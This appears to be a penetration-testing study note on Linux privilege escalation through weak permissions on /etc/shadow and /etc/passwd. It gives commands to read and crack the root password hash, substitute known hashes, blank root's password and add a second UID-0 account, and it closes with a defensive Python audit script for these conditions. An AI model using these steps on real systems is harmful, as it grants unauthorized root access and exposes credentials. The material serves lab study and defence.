# Weak File Permissions

The /etc/shadow file contains user password hashes, and by default is not readable by any user except for root. If we are able to read the contents of the /etc/shadow file, we might be able to crack the root user's password hash. If we are able to modify the /etc/shadow file, we can replace the root user's password hash with one we know.

---

## Readable /etc/shadow file

The root user's password hash is the first line in the shadow file. We will use the following command to get the root user's password hash:

```bash
$ head -n 1 /etc/shadow
```

![[Pasted image 20220805003437.png]]

The user's password hash is between the first and second `:`. The `$6$` at the beginning of the hash indicates it was generated using sha512crypt.

Move the hash to a file called "hash.txt" and crack it with john:

```bash
$ john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```

The above command will attempt to crack the hash using john.

---

## Writable /etc/shadow

Run the Linux enumeration script with the level set to 1:

```bash
$ ./lse.sh -l 1 -i | more
```

![[Pasted image 20220805010311.png]]

This is a list of files our user can write to outside our home directory.

![[Pasted image 20220805085148.png]]

The shadow file is world writable. Make a backup of the file so it can be restored later, then make a new sha512 hash with a known password to replace the root user's hash:

```bash
┌──(kali㉿kali)-[~/Downloads]
└─$ mkpasswd -m sha-512 newpassword
$6$YOGqTN7lonfyBBsP$8Bd7Cf6iaOBH24cc0vL3xVTMM3.MDcCeFW9JJwkp6HveGcPTLsmN56p7dkpWavc1aN0BflTMJj02ZYxOEQKwJ0
```

---

## Writable /etc/passwd

The /etc/passwd file historically contained user password hashes. For backwards compatibility, if the second field of a user row in /etc/passwd contains a password hash, it takes precedence over the hash in /etc/shadow.

If we can only append to the file, we can create a new user but assign them the root user ID (0). This works because Linux allows multiple entries for the same user ID, as long as the usernames are different.

The root account in /etc/passwd is usually configured like this:

```bash
┌──(kali㉿kali)-[~/Downloads]
└─$ cat /etc/passwd
root:x:0:0:root:/root:/usr/bin/zsh
```

The "x" in the second field instructs Linux to look for the password hash in the /etc/shadow file. In some versions of Linux, it is possible to simply delete the "x", which Linux interprets as the user having no password. Example below:

```bash
root::0:0:root:/root:/usr/bin/zsh
```

To add a password hash to the /etc/passwd file, generate a password hash using openssl:

```bash
┌──(kali㉿kali)-[~/Downloads]
└─$ openssl passwd "password"
XuT2vUIRQ8lwI
```

Edit the /etc/passwd file, and enter the new hash in the second field of the root user's row, where there currently should be an x:

```bash
root:XuT2vUIRQ8lwI:0:0:root:/root:/usr/bin/zsh
```

Alternatively, append a new line to the /etc/passwd file with the root user ID, but a new username.

![[Pasted image 20220805092133.png]]

## Backups

A user may have created an insecure backup of sensitive files. Some common places to store these files are the / (root) directory, /tmp, and /var/backups.
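As an added defender-side audit (not part of the original note), the following Python script checks for the conditions described in the /etc/shadow and /etc/passwd sections above: a world-readable or world-writable shadow file, a world-writable passwd file, passwd entries whose second field is not `x` (an inline hash or an empty field), and extra accounts sharing UID 0. The `SAMPLE_PASSWD` text is constructed for illustration.

```python
import os
import stat

# Constructed sample /etc/passwd: a second UID-0 account carrying an inline hash, and an account with an empty password field
SAMPLE_PASSWD = """root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
backup:XuT2vUIRQ8lwI:0:0:root:/root:/bin/bash
guest::1001:1001::/home/guest:/bin/bash
"""

def audit_passwd(passwd_text):
    """Flag entries whose password field is not 'x' and extra UID-0 accounts."""
    findings, uid0 = [], []
    for line in passwd_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed entry, skip
        name, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.append(f"{name}: empty password field, no password required")
        elif pw != "x":
            findings.append(f"{name}: hash in /etc/passwd overrides /etc/shadow")
        if uid == "0":
            uid0.append(name)
    # Multiple entries may share UID 0 as long as the names differ
    findings += [f"{n}: extra account with UID 0" for n in uid0 if n != "root"]
    return findings

def audit_mode(path, mode):
    """Check permission bits (st_mode) for the weaknesses above."""
    findings = []
    if mode & stat.S_IWOTH:
        findings.append(f"{path}: world-writable")
    if path.endswith("shadow") and mode & stat.S_IROTH:
        findings.append(f"{path}: world-readable")
    return findings

def audit_system(paths=("/etc/passwd", "/etc/shadow")):
    """Run the permission checks against the files on this host."""
    return [f for p in paths if os.path.exists(p)
            for f in audit_mode(p, os.stat(p).st_mode)]

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD) + audit_system():
        print(finding)
```

On a real host, pass `open("/etc/passwd").read()` to `audit_passwd` instead of the sample text.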